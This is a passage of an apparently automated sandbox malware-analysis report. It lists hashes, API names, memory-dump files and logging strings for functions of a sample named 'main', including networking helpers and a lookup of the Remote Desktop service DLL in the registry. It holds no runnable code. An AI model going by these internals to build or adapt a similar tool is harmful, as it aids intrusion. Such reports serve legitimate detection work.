                  • Instruction ID: 350c13c57bc2e2fdcf8d1dacd5220ec29b3317bf62508ff1e0cdfbf23a47f2db
                  • Opcode Fuzzy Hash: 5124ac14fcf3d2f0fb5204d63161834fb47c8434f70f0caa57941e07c2c0f691
                  • Instruction Fuzzy Hash: 43F030A1B0D40791FB119B25E8443F523616F54BD5F544837D8ED461B6EE6DE548C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: Startupfflushfwrite
                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                  • API String ID: 3771387389-898331216
                  • Opcode ID: d3150d479d03185cf1df052be2b4772a1426cce77eaf7377fc5e95477546ca01
                  • Instruction ID: 2c189b096d5cb1e7e7c43f4c978270bd5bdf099b3c90fdc92686eec80f037bf0
                  • Opcode Fuzzy Hash: d3150d479d03185cf1df052be2b4772a1426cce77eaf7377fc5e95477546ca01
                  • Instruction Fuzzy Hash: 84F01D60B08D4B92FF109FA2EC457F66218AF203B4F8410B2D40E5A1B6EE9DE5998340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: strlen$HandleModule_mbscpy
                  • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                  • API String ID: 3656010895-1379287937
                  • Opcode ID: 0278e259e138aef7b5b47ec0fb05da481d0b7ed9b9eeaf2a18626e7b71e14705
                  • Instruction ID: 707de7127a7041a3324e70b8d2503ff0f1dfaad3b92d4ddf01084a82fa95ef43
                  • Opcode Fuzzy Hash: 0278e259e138aef7b5b47ec0fb05da481d0b7ed9b9eeaf2a18626e7b71e14705
                  • Instruction Fuzzy Hash: 1131813270CB87D1FB55AB64E8913FAB361EB84384FE04076E64D87299DE2DD909C750
                  APIs
                  • GetProcAddress.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901633
                  • GetLastError.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901666
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: AddressErrorLastProcfflushfwrite
                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                  • API String ID: 1224403792-3063791425
                  • Opcode ID: 72a1d32406d5cd9eb47b613c8f5aff9778c65903043b907605b2154eaad96c50
                  • Instruction ID: bcdd5d4b156581fd379adbe953e6c1730cd0244ded0e9ae68ce2d64e828de991
                  • Opcode Fuzzy Hash: 72a1d32406d5cd9eb47b613c8f5aff9778c65903043b907605b2154eaad96c50
                  • Instruction Fuzzy Hash: A1F0D190A08703C5FE526705E9015B992516F45BD8FB84176CD5C8B799EE2CEA568320
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: AddressErrorLastProcfflushfwrite
                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                  • API String ID: 1224403792-3063791425
                  • Opcode ID: 207ffa58a88764108bf6decabdb2f8972244fc5bfb5b7b5920c4db14a3a95db6
                  • Instruction ID: 1c8e88220af6199d74cae757419760c8a030a78d423ea027304f2734d01111bc
                  • Opcode Fuzzy Hash: 207ffa58a88764108bf6decabdb2f8972244fc5bfb5b7b5920c4db14a3a95db6
                  • Instruction Fuzzy Hash: 54F08190B1DE0391FB139B9BA9001B9636AAF44BE0F448579DC5D4B7B9EE2CE5468300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: AddressErrorLastProcfflushfwrite
                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                  • API String ID: 1224403792-3063791425
                  • Opcode ID: 204197e28d0218e5bb9a1a286745401afee39e57a0e3aa4e79a336b4d32a1a88
                  • Instruction ID: b6ca3425774f9f4edb75aa4240e7ca6d9b1a92dbeb84f8df90d30d0f2c7afb2d
                  • Opcode Fuzzy Hash: 204197e28d0218e5bb9a1a286745401afee39e57a0e3aa4e79a336b4d32a1a88
                  • Instruction Fuzzy Hash: 67F0A4D1F1A74752FA719F49A8006B563A1AF44BD0F488131DDDD4B7B8EF2CE6868B00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: AddressErrorLastProcfflushfwrite
                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                  • API String ID: 1224403792-3063791425
                  • Opcode ID: c197a9657db9c7da096505ab386be7bd724489283de748c128f0a002c1b1a445
                  • Instruction ID: 3022929cc10eee8fff162a51c0703f62061bd30e82b1bd1b3675752226b42656
                  • Opcode Fuzzy Hash: c197a9657db9c7da096505ab386be7bd724489283de748c128f0a002c1b1a445
                  • Instruction Fuzzy Hash: 9EF0A990B0A65751FA514756E9001F9A321AF48FC0F554533ECDD4B779EF2CDA4A8300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: AddressErrorLastProcfflushfwrite
                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                  • API String ID: 1224403792-3063791425
                  • Opcode ID: 65fa061a218c026dd9945c36cd5a0c410748d6b7fb06b96f136c5ff433fb326e
                  • Instruction ID: 8efe812b46552224a1358ee3f90f9d0430c9e22d13bfb09b46ec7241c6384720
                  • Opcode Fuzzy Hash: 65fa061a218c026dd9945c36cd5a0c410748d6b7fb06b96f136c5ff433fb326e
                  • Instruction Fuzzy Hash: 3DF08150A0DE5782FF118B87EC002AB52696F44FF4F485171DD5C0B7B9EE2CE5968300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastLibraryLoadfflushfwrite
                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                  • API String ID: 4085810780-3386190286
                  • Opcode ID: 7410152268ada712884bd5148c559befc1376da73c8ea4b72d111df4c4faeaca
                  • Instruction ID: a637cad27951fa8d322440910df6cd8c41515e9ec171a1d6ba04d17fe42b4db2
                  • Opcode Fuzzy Hash: 7410152268ada712884bd5148c559befc1376da73c8ea4b72d111df4c4faeaca
                  • Instruction Fuzzy Hash: 7CF05E54E4AE07A0EF12A7BFA8504B82299AF15BA0F4855B5CC0E56375FD1CE986C310
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: ErrorLastLibraryLoadfflushfwrite
                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                  • API String ID: 4085810780-3386190286
                  • Opcode ID: 0816c4c5aace0ee0c92104ebcd679995e601e5eb34cc43c6fa76a6c60365b11d
                  • Instruction ID: fc2fc5445f7da2e2dace002e293ebd0084e4ba1f189d9783a6a7b632a76b8774
                  • Opcode Fuzzy Hash: 0816c4c5aace0ee0c92104ebcd679995e601e5eb34cc43c6fa76a6c60365b11d
                  • Instruction Fuzzy Hash: 28F05891F0AB4B50F9B59F5EE8505B023A0EF04B84F884531CD8C5B779FE2CA5868B00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: ErrorLastLibraryLoadfflushfwrite
                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                  • API String ID: 4085810780-3386190286
                  • Opcode ID: 646d57b541b335a283eea89aabbd0e98fb64b2e9af168f0a9fdd3a4f1d6bc300
                  • Instruction ID: f5871e40deb10dbc477549004d6c6ae5c4c4a0c635c2cb6dea56ed053009dee0
                  • Opcode Fuzzy Hash: 646d57b541b335a283eea89aabbd0e98fb64b2e9af168f0a9fdd3a4f1d6bc300
                  • Instruction Fuzzy Hash: 79F08260F0FA1750FE529B5AA8405F423606F88FC0F595873DCCD57B76ED1CA5898340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: ErrorLastLibraryLoadfflushfwrite
                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                  • API String ID: 4085810780-3386190286
                  • Opcode ID: 9b3eac2299f60b86e3d521002da07dc2f4d4a994ecdc1d0da0b6fd7200d9ea68
                  • Instruction ID: cc50d90efd9392bb23ab6cb7ad5f039f674ff3c5a8710816e69a49e2b8511d3c
                  • Opcode Fuzzy Hash: 9b3eac2299f60b86e3d521002da07dc2f4d4a994ecdc1d0da0b6fd7200d9ea68
                  • Instruction Fuzzy Hash: 58F05E14E0AE5785FF519BD7AC446F612585F58BB0F8824B1CD0C26371ED2CB5868300
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Openstrcmpstrlen
                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                  • API String ID: 679246061-1413152910
                  • Opcode ID: fcf01618166d6772e81f11eb3996559ca3f77ef975368beb83bea753555944a6
                  • Instruction ID: a571f353aa3f2f5e48ea19dbf935d93756a9b9001fc3d9056103a16012d1f6a3
                  • Opcode Fuzzy Hash: fcf01618166d6772e81f11eb3996559ca3f77ef975368beb83bea753555944a6
                  • Instruction Fuzzy Hash: BF212CA2A1DB8792EA319F10A8913FA6354EB50315F800032E6DE465B5DF2CD649CA40
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastfflushfwriteioctlsocket
                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                  • API String ID: 325303940-110789774
                  • Opcode ID: 007b94f043fb3cde79ec489f0ad8a0c70b5437ab3b484004fe57740600d97eec
                  • Instruction ID: 67e554846ef788815c89a761960aa54797282978f3c38b6fddfe689e2af91efe
                  • Opcode Fuzzy Hash: 007b94f043fb3cde79ec489f0ad8a0c70b5437ab3b484004fe57740600d97eec
                  • Instruction Fuzzy Hash: B9F0F6A1F0CA1396F71157EBA8401BD6269EB947B4F148276EC2E833B4DE3CE9468701
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: ErrorLastfflushfwriteioctlsocket
                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                  • API String ID: 325303940-110789774
                  • Opcode ID: 491ca2efa7c855bf823389286f95842b7971bdf9ad15312334074ab60ee9df2f
                  • Instruction ID: b863847fb005974a83a2e0bffbd140d00f9f0b9058f3cc7cfceae45471eb5ec5
                  • Opcode Fuzzy Hash: 491ca2efa7c855bf823389286f95842b7971bdf9ad15312334074ab60ee9df2f
                  • Instruction Fuzzy Hash: 31F068A1F0C64356F3345F69A8002B65660EB94754F148235DCAE937B4DE7C98568F01
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: ErrorLastfflushfwriteioctlsocket
                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                  • API String ID: 325303940-110789774
                  • Opcode ID: 3e4103bee5abb71778d63ab542923b9989150a137cd39017df41709a0e9334bd
                  • Instruction ID: ccf33a5c32118901ec496bd670a40ee1e6eabfcbd21bca98c2352e6775a8bb95
                  • Opcode Fuzzy Hash: 3e4103bee5abb71778d63ab542923b9989150a137cd39017df41709a0e9334bd
                  • Instruction Fuzzy Hash: 16F09671F0D64386F7105769B8401B55260EF94794F108237EDAE837B5DE3CD94AC701
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: ErrorLastfflushfwriteioctlsocket
                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                  • API String ID: 325303940-110789774
                  • Opcode ID: dd9153f1ae20d15b24664b26d27a0e3f3d19c0b133190d0fe7bda50892638261
                  • Instruction ID: d299995ef46911e125d10dec847d5653b4765e18f6a8b544e25719f9bd4c7150
                  • Opcode Fuzzy Hash: dd9153f1ae20d15b24664b26d27a0e3f3d19c0b133190d0fe7bda50892638261
                  • Instruction Fuzzy Hash: 62F09661F0CA5386FB105BABAC002BB5168AB947B4F545172EC2D877B4DE3CE8468700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                  • API String ID: 1729277954-3534120083
                  • Opcode ID: 5f9220f8437169eb67f67e5f2495073c1b6f29ca8b8ca016f008a35058367dca
                  • Instruction ID: 65eb02450573b341aba7fa1d7f4fbce8f5172f94f8e01aaae4ffcb9a732203e0
                  • Opcode Fuzzy Hash: 5f9220f8437169eb67f67e5f2495073c1b6f29ca8b8ca016f008a35058367dca
                  • Instruction Fuzzy Hash: 55F02BB1B0C90296F3105B6BB8405B96665BB947B4F008275ED5D837B8DF3CD54BC700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: ErrorLastsetsockopt
                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                  • API String ID: 1729277954-3534120083
                  • Opcode ID: f73191922408c38ddcde4302cf36f1d3d11bbd068eba9f1f2a5320039dc8a134
                  • Instruction ID: 0c50c3a0fcaea9f8db117fbf5e5b6d31f947e0e6e55d26d532de15909191020d
                  • Opcode Fuzzy Hash: f73191922408c38ddcde4302cf36f1d3d11bbd068eba9f1f2a5320039dc8a134
                  • Instruction Fuzzy Hash: 5AF096B2B186425AF3205F19B8006A56660EB88764F108231EDAD83BF4DF7DD945CF00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
